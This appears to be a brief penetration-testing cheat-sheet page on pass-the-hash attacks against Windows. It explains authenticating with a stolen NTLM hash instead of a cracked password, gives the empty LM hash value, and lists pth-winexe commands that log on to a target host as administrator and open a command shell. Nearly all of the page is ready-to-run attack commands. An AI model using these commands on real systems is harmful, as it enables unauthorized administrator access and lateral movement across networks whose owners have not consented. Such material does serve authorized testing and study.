Passing the Hash

Pass the hash

Passing the hash 
Authenticate by passing the hash as a password instead of cracking it. 
Replace the NOPASSWORD from the hashes with an empty LM hash: aad3b435b51404eeaad3b435b51404ee 
pth-(TAB to see Options) 
​
export SMBHASH=...........HASH.................        # Remove NO PASSWORD on the hashes with an NTLM Hash  
​
pth-winexe -U administrator% //10.10.10.10 cmd         # Log on to the target
​
OR (just run the following)
​
pth-winexe -U administrator%hash //10.10.10.10 cmd     # Log on to the target

Password Attacks

SAM/SYSTEM

Last modified 4yr ago